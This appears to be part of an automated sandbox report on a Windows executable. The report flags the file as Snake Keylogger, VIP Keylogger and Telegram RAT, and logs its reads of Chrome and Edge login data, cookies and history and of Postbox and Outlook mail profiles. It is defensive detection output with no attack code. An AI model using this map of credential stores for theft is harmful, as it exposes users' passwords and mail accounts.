Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Users\user\Desktop\M2AB8BeHc4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.4176439192.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 3.2.M2AB8BeHc4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.4478948.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: M2AB8BeHc4.exe PID: 6520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: M2AB8BeHc4.exe PID: 2720, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 3.2.M2AB8BeHc4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.4478948.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: M2AB8BeHc4.exe PID: 6520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: M2AB8BeHc4.exe PID: 2720, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 3.2.M2AB8BeHc4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.4478948.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: M2AB8BeHc4.exe PID: 6520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: M2AB8BeHc4.exe PID: 2720, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.4176439192.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 3.2.M2AB8BeHc4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.4478948.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
